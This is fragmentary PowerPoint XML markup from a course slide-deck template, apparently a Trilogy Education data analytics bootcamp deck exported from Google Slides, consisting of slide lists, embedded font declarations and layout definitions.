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5" r:id="rId9"/>
    <p:sldId id="267" r:id="rId10"/>
    <p:sldId id="310" r:id="rId11"/>
    <p:sldId id="271" r:id="rId12"/>
    <p:sldId id="273" r:id="rId13"/>
    <p:sldId id="275" r:id="rId14"/>
    <p:sldId id="278" r:id="rId15"/>
    <p:sldId id="280" r:id="rId16"/>
    <p:sldId id="286" r:id="rId17"/>
    <p:sldId id="290" r:id="rId18"/>
    <p:sldId id="291" r:id="rId19"/>
    <p:sldId id="294" r:id="rId20"/>
    <p:sldId id="295" r:id="rId21"/>
    <p:sldId id="296" r:id="rId22"/>
    <p:sldId id="298" r:id="rId23"/>
    <p:sldId id="299" r:id="rId24"/>
    <p:sldId id="302" r:id="rId25"/>
    <p:sldId id="303" r:id="rId26"/>
    <p:sldId id="304" r:id="rId27"/>
    <p:sldId id="305" r:id="rId28"/>
    <p:sldId id="306" r:id="rId29"/>
    <p:sldId id="307" r:id="rId30"/>
    <p:sldId id="308" r:id="rId31"/>
    <p:sldId id="309" r:id="rId32"/>
    <p:sldId id="263" r:id="rId33"/>
    <p:sldId id="312" r:id="rId34"/>
    <p:sldId id="268" r:id="rId35"/>
    <p:sldId id="270" r:id="rId36"/>
    <p:sldId id="272" r:id="rId37"/>
    <p:sldId id="274" r:id="rId38"/>
    <p:sldId id="311" r:id="rId39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41"/>
      <p:bold r:id="rId42"/>
      <p:italic r:id="rId43"/>
      <p:boldItalic r:id="rId44"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId45"/>
      <p:bold r:id="rId46"/>
      <p:italic r:id="rId47"/>
      <p:boldItalic r:id="rId48"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:bold r:id="rId49"/>
      <p:boldItalic r:id="rId50"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId51"/>
      <p:bold r:id="rId52"/>
      <p:italic r:id="rId53"/>
      <p:boldItalic r:id="rId54"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId55"/>
      <p:bold r:id="rId56"/>
      <p:italic r:id="rId57"/>
      <p:boldItalic r:id="rId58"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId59"/>
      <p:bold r:id="rId60"/>
      <p:italic r:id="rId61"/>
      <p:boldItalic r:id="rId6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>
          <p15:clr>
            <a:srgbClr val="9AA0A6"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" orient="horz" pos="2232">
          <p15:clr>
            <a:srgbClr val="9AA0A6"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3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78" roundtripDataSignature="AMtx7miFV1FNBCg+ncn32jqWaWZGdYJJ5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3185B22-D61D-45F9-9CB7-DBD8C1C59AAB}">
  <a:tblStyle styleId="{63185B22-D61D-45F9-9CB7-DBD8C1C59AAB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5" d="100"/>
          <a:sy n="115" d="100"/>
        </p:scale>
        <p:origin x="514" y="72"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz"/>
        <p:guide orient="horz" pos="2232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2.fntdata"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font7.fntdata"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font10.fntdata"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font15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font" Target="fonts/font5.fntdata"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font13.fntdata"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font18.fntdata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font" Target="fonts/font21.fntdata"/><Relationship Id="rId82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3.fntdata"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font8.fntdata"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font16.fntdata"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font11.fntdata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6.fntdata"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font19.fntdata"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font1.fntdata"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font14.fntdata"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font2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9.fntdata"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font17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4.fntdata"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font12.fntdata"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font20.fntdata"/><Relationship Id="rId78" Type="http://customschemas.google.com/relationships/presentationmetadata" Target="metadata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6" name="Google Shape;101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62" name="Google Shape;1162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9169265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0" name="Google Shape;1190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91" name="Google Shape;1191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5" name="Google Shape;1205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06" name="Google Shape;1206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3" name="Google Shape;1233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34" name="Google Shape;1234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5" name="Google Shape;1255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56" name="Google Shape;1256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71" name="Google Shape;1271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8" name="Google Shape;1318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19" name="Google Shape;1319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0" name="Google Shape;1350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51" name="Google Shape;1351;p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8" name="Google Shape;1358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59" name="Google Shape;1359;p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" name="Google Shape;1382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83" name="Google Shape;1383;p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22" name="Google Shape;102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0" name="Google Shape;1390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91" name="Google Shape;1391;p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8" name="Google Shape;1398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99" name="Google Shape;1399;p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4" name="Google Shape;1414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15" name="Google Shape;1415;p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2" name="Google Shape;1422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23" name="Google Shape;1423;p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6" name="Google Shape;1446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47" name="Google Shape;1447;p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3" name="Google Shape;1453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54" name="Google Shape;1454;p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1" name="Google Shape;1461;p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62" name="Google Shape;1462;p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9" name="Google Shape;1469;p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70" name="Google Shape;1470;p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7" name="Google Shape;1477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78" name="Google Shape;1478;p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87" name="Google Shape;1487;p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9" name="Google Shape;1049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95" name="Google Shape;1495;p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9" name="Google Shape;1049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429172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88" name="Google Shape;1088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Google Shape;1108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09" name="Google Shape;110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89571631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1" name="Google Shape;1141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9" name="Google Shape;1169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70" name="Google Shape;1170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" name="Google Shape;1198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99" name="Google Shape;1199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2" name="Google Shape;1212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3" name="Google Shape;1213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3" name="Google Shape;1233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34" name="Google Shape;1234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112976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55" name="Google Shape;1055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64" name="Google Shape;1064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Google Shape;107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72" name="Google Shape;1072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Google Shape;107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80" name="Google Shape;1080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Google Shape;1116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17" name="Google Shape;1117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2" name="Google Shape;1132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33" name="Google Shape;1133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png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7.pn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png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 Transition Slide">
  <p:cSld name="CUSTOM_17_2_1_2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8;p56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56"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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" name="Google Shape;10;p5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" name="Google Shape;11;p5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. Title Slide:Data Analytics and Visualization">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_1_1_1_1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65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411"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Google Shape;86;p6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7" name="Google Shape;87;p6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411"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="88" name="Google Shape;88;p6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6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marR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 b="0" i="0" u="none" strike="noStrike" cap="none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90" name="Google Shape;90;p65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" name="Google Shape;91;p65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" name="Google Shape;92;p65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" name="Google Shape;93;p6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2019 Trilogy Education Services, Inc. </a:t>
            </a:r>
            <a:endParaRPr sz="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. Call Attention Slide">
  <p:cSld name="CUSTOM_2_3_1_1_3_1_1_2_1_1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66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66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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97" name="Google Shape;97;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="138" r="148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6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9" name="Google Shape;99;p6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. Instructor Demonstration">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_2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67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="58" b="58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67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67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6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5" name="Google Shape;105;p67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400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en-US" sz="27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 b="0" i="0" u="none" strike="noStrike" cap="none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06" name="Google Shape;106;p67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07" name="Google Shape;107;p6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67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914400" bIns="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. Activity">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1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68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="58" b="58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68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2" name="Google Shape;112;p6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68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4" name="Google Shape;114;p68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5" name="Google Shape;115;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="29" b="3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6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7" name="Google Shape;117;p68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8" name="Google Shape;118;p6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" name="Google Shape;119;p68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. Activity with Instructions ">
  <p:cSld name="CUSTOM_2_5_1_3_1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69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="29" b="3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6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23" name="Google Shape;123;p6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4" name="Google Shape;124;p6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" name="Google Shape;125;p6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" name="Google Shape;126;p69"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2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00000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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="127" name="Google Shape;127;p6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8" name="Google Shape;128;p69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" name="Google Shape;129;p69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. Challenge">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_4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70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="58" b="58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70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3" name="Google Shape;133;p7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7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5" name="Google Shape;135;p70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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" name="Google Shape;136;p70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2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" name="Google Shape;137;p70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8" name="Google Shape;138;p7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39" name="Google Shape;139;p7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. Challenge with Instructions">
  <p:cSld name="CUSTOM_2_5_1_4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71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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2" name="Google Shape;142;p7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43" name="Google Shape;143;p7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44" name="Google Shape;144;p71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00000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45" name="Google Shape;145;p71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2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" name="Google Shape;146;p71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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47" name="Google Shape;147;p7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48" name="Google Shape;148;p71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49" name="Google Shape;149;p7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. Homework">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_3_1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72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="58" b="58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72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3" name="Google Shape;153;p72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="209" r="207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7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5" name="Google Shape;155;p7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7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7" name="Google Shape;157;p72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8" name="Google Shape;158;p72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sz="1300" b="1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9" name="Google Shape;159;p72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0" name="Google Shape;160;p72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800">
          <p15:clr>
            <a:srgbClr val="F9AD4C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. Homework with Instructions">
  <p:cSld name="CUSTOM_2_5_2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73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00000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63" name="Google Shape;163;p7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64" name="Google Shape;164;p7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65" name="Google Shape;165;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="504" r="502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7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7" name="Google Shape;167;p73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2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68" name="Google Shape;168;p7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9" name="Google Shape;169;p73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0" name="Google Shape;170;p73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005">
          <p15:clr>
            <a:srgbClr val="F9AD4C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. Numbered 1–4 (Green)">
  <p:cSld name="CUSTOM_2_7_1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74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7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4" name="Google Shape;174;p7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75" name="Google Shape;175;p7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6" name="Google Shape;176;p7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77" name="Google Shape;177;p7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8" name="Google Shape;178;p7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79" name="Google Shape;179;p74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80" name="Google Shape;180;p7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-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:srgbClr val="000000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 b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000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81" name="Google Shape;181;p7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2" name="Google Shape;182;p74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83" name="Google Shape;183;p7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-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:srgbClr val="000000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 b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000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84" name="Google Shape;184;p7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5" name="Google Shape;185;p74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86" name="Google Shape;186;p7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-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="non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 b="0" i="0" u="none" strike="noStrike" cap="non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87" name="Google Shape;187;p7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8" name="Google Shape;188;p74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89" name="Google Shape;189;p7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-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="non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 b="0" i="0" u="none" strike="noStrike" cap="non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0" name="Google Shape;190;p7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1" name="Google Shape;191;p74"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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2" name="Google Shape;192;p74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74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74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74"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4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6" name="Google Shape;196;p74"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5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7" name="Google Shape;197;p74"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6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. Text Only">
  <p:cSld name="CUSTOM_2_7_2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5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5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5" name="Google Shape;15;p5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" name="Google Shape;16;p5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7" name="Google Shape;17;p5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8" name="Google Shape;18;p5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" name="Google Shape;19;p57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3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00000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. Numbered 1–5 (Green)">
  <p:cSld name="CUSTOM_2_7_1_4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7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7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1" name="Google Shape;201;p7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202" name="Google Shape;202;p7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3" name="Google Shape;203;p7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04" name="Google Shape;204;p7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5" name="Google Shape;205;p7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206" name="Google Shape;206;p75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207" name="Google Shape;207;p7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-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:srgbClr val="000000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 b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000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8" name="Google Shape;208;p7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9" name="Google Shape;209;p75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210" name="Google Shape;210;p7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-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:srgbClr val="000000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 b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000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1" name="Google Shape;211;p7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2" name="Google Shape;212;p75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213" name="Google Shape;213;p7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-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="non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 b="0" i="0" u="none" strike="noStrike" cap="non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4" name="Google Shape;214;p7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5" name="Google Shape;215;p75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216" name="Google Shape;216;p7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-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="non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 b="0" i="0" u="none" strike="noStrike" cap="non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7" name="Google Shape;217;p7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8" name="Google Shape;218;p75"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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9" name="Google Shape;219;p7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7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7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75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3" name="Google Shape;223;p75"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5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4" name="Google Shape;224;p75"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6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225" name="Google Shape;225;p75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26" name="Google Shape;226;p7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-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="non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 b="0" i="0" u="none" strike="noStrike" cap="non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7" name="Google Shape;227;p7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8" name="Google Shape;228;p7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p75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. Numbered 1–6 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1"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76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p7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3" name="Google Shape;233;p7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234" name="Google Shape;234;p7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35" name="Google Shape;235;p7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36" name="Google Shape;236;p7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37" name="Google Shape;237;p7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238" name="Google Shape;238;p76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39" name="Google Shape;239;p7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-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="non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 b="0" i="0" u="none" strike="noStrike" cap="non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0" name="Google Shape;240;p7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1" name="Google Shape;241;p76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2" name="Google Shape;242;p76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43" name="Google Shape;243;p76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44" name="Google Shape;244;p7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-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="non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 b="0" i="0" u="none" strike="noStrike" cap="non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5" name="Google Shape;245;p7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6" name="Google Shape;246;p76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47" name="Google Shape;247;p76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48" name="Google Shape;248;p7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-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="non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 b="0" i="0" u="none" strike="noStrike" cap="non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9" name="Google Shape;249;p7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0" name="Google Shape;250;p76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1" name="Google Shape;251;p76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52" name="Google Shape;252;p7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-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="non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 b="0" i="0" u="none" strike="noStrike" cap="non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3" name="Google Shape;253;p7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4" name="Google Shape;254;p76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5" name="Google Shape;255;p76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56" name="Google Shape;256;p7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-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="non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 b="0" i="0" u="none" strike="noStrike" cap="non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7" name="Google Shape;257;p7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" name="Google Shape;258;p76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9" name="Google Shape;259;p76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60" name="Google Shape;260;p7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-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="non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 b="0" i="0" u="none" strike="noStrike" cap="non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1" name="Google Shape;261;p7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2" name="Google Shape;262;p76"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4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3" name="Google Shape;263;p76"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5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4" name="Google Shape;264;p76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5" name="Google Shape;265;p76"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7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6" name="Google Shape;266;p76"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8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. Numbered 1–6 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_2"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77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p7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0" name="Google Shape;270;p7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271" name="Google Shape;271;p7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72" name="Google Shape;272;p7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73" name="Google Shape;273;p7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74" name="Google Shape;274;p7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275" name="Google Shape;275;p77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76" name="Google Shape;276;p7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-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="non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 b="0" i="0" u="none" strike="noStrike" cap="non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7" name="Google Shape;277;p7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8" name="Google Shape;278;p77"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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9" name="Google Shape;279;p77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0" name="Google Shape;280;p77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81" name="Google Shape;281;p7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-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="non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 b="0" i="0" u="none" strike="noStrike" cap="non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2" name="Google Shape;282;p7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" name="Google Shape;283;p77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4" name="Google Shape;284;p77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85" name="Google Shape;285;p7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-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="non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 b="0" i="0" u="none" strike="noStrike" cap="non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6" name="Google Shape;286;p7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7" name="Google Shape;287;p77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8" name="Google Shape;288;p77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89" name="Google Shape;289;p7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-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="non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 b="0" i="0" u="none" strike="noStrike" cap="non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0" name="Google Shape;290;p7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1" name="Google Shape;291;p77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92" name="Google Shape;292;p77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93" name="Google Shape;293;p7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-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="non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 b="0" i="0" u="none" strike="noStrike" cap="non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4" name="Google Shape;294;p7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5" name="Google Shape;295;p77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96" name="Google Shape;296;p77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97" name="Google Shape;297;p7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-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="non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 b="0" i="0" u="none" strike="noStrike" cap="non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8" name="Google Shape;298;p7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9" name="Google Shape;299;p77"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4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0" name="Google Shape;300;p77"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5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1" name="Google Shape;301;p77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2" name="Google Shape;302;p77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3" name="Google Shape;303;p77"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8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. Numbered 1–7 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1"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78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p7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7" name="Google Shape;307;p7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308" name="Google Shape;308;p7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09" name="Google Shape;309;p7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310" name="Google Shape;310;p7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11" name="Google Shape;311;p7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312" name="Google Shape;312;p78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313" name="Google Shape;313;p7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lang="en-US" sz="26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4" name="Google Shape;314;p7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5" name="Google Shape;315;p78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6" name="Google Shape;316;p78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17" name="Google Shape;317;p78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18" name="Google Shape;318;p7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lang="en-US" sz="26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9" name="Google Shape;319;p7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20" name="Google Shape;320;p78"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4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1" name="Google Shape;321;p78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22" name="Google Shape;322;p78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23" name="Google Shape;323;p7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lang="en-US" sz="26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4" name="Google Shape;324;p7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25" name="Google Shape;325;p78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6" name="Google Shape;326;p78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27" name="Google Shape;327;p78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28" name="Google Shape;328;p7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lang="en-US" sz="26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9" name="Google Shape;329;p7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30" name="Google Shape;330;p78"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6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1" name="Google Shape;331;p78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32" name="Google Shape;332;p78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33" name="Google Shape;333;p7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lang="en-US" sz="26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4" name="Google Shape;334;p7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35" name="Google Shape;335;p78"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7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6" name="Google Shape;336;p78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37" name="Google Shape;337;p78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38" name="Google Shape;338;p7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lang="en-US" sz="26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9" name="Google Shape;339;p7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0" name="Google Shape;340;p78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1" name="Google Shape;341;p78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42" name="Google Shape;342;p78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43" name="Google Shape;343;p7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lang="en-US" sz="26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4" name="Google Shape;344;p7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5" name="Google Shape;345;p78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. Numbered 1–8 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1"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7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8" name="Google Shape;348;p7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349" name="Google Shape;349;p7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50" name="Google Shape;350;p7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351" name="Google Shape;351;p7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52" name="Google Shape;352;p7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3" name="Google Shape;353;p79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54" name="Google Shape;354;p79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55" name="Google Shape;355;p7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6" name="Google Shape;356;p7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57" name="Google Shape;357;p79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8" name="Google Shape;358;p79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59" name="Google Shape;359;p79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60" name="Google Shape;360;p7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1" name="Google Shape;361;p7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2" name="Google Shape;362;p79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3" name="Google Shape;363;p79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64" name="Google Shape;364;p79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65" name="Google Shape;365;p7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6" name="Google Shape;366;p7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7" name="Google Shape;367;p79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8" name="Google Shape;368;p79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69" name="Google Shape;369;p79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70" name="Google Shape;370;p7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1" name="Google Shape;371;p7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72" name="Google Shape;372;p79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3" name="Google Shape;373;p79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74" name="Google Shape;374;p79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375" name="Google Shape;375;p7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6" name="Google Shape;376;p7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77" name="Google Shape;377;p79"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7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8" name="Google Shape;378;p79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79" name="Google Shape;379;p79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380" name="Google Shape;380;p7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1" name="Google Shape;381;p7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82" name="Google Shape;382;p79"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8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3" name="Google Shape;383;p79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84" name="Google Shape;384;p79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385" name="Google Shape;385;p7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6" name="Google Shape;386;p7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87" name="Google Shape;387;p79"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9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8" name="Google Shape;388;p79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89" name="Google Shape;389;p79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390" name="Google Shape;390;p7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1" name="Google Shape;391;p7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92" name="Google Shape;392;p79"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13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. Numbered 1–8 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1"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8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5" name="Google Shape;395;p8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396" name="Google Shape;396;p8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7" name="Google Shape;397;p8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398" name="Google Shape;398;p8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9" name="Google Shape;399;p8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0" name="Google Shape;400;p80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01" name="Google Shape;401;p80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402" name="Google Shape;402;p8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3" name="Google Shape;403;p8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04" name="Google Shape;404;p80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5" name="Google Shape;405;p80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06" name="Google Shape;406;p80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407" name="Google Shape;407;p8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8" name="Google Shape;408;p8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09" name="Google Shape;409;p80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0" name="Google Shape;410;p80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11" name="Google Shape;411;p80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412" name="Google Shape;412;p8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3" name="Google Shape;413;p8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14" name="Google Shape;414;p80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5" name="Google Shape;415;p80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16" name="Google Shape;416;p80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417" name="Google Shape;417;p8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8" name="Google Shape;418;p8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19" name="Google Shape;419;p80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0" name="Google Shape;420;p80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21" name="Google Shape;421;p80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22" name="Google Shape;422;p8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3" name="Google Shape;423;p8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24" name="Google Shape;424;p80"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7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5" name="Google Shape;425;p80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26" name="Google Shape;426;p80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27" name="Google Shape;427;p8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8" name="Google Shape;428;p8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29" name="Google Shape;429;p80"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8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0" name="Google Shape;430;p80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31" name="Google Shape;431;p80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32" name="Google Shape;432;p8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3" name="Google Shape;433;p8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34" name="Google Shape;434;p80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5" name="Google Shape;435;p80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36" name="Google Shape;436;p80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37" name="Google Shape;437;p8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8" name="Google Shape;438;p8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39" name="Google Shape;439;p80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. Numbered 1–3 (Green)">
  <p:cSld name="CUSTOM_2_7_1_5"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8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2" name="Google Shape;442;p8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443" name="Google Shape;443;p8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44" name="Google Shape;444;p8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445" name="Google Shape;445;p8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46" name="Google Shape;446;p8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447" name="Google Shape;447;p81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48" name="Google Shape;448;p8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lang="en-US" sz="2100" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
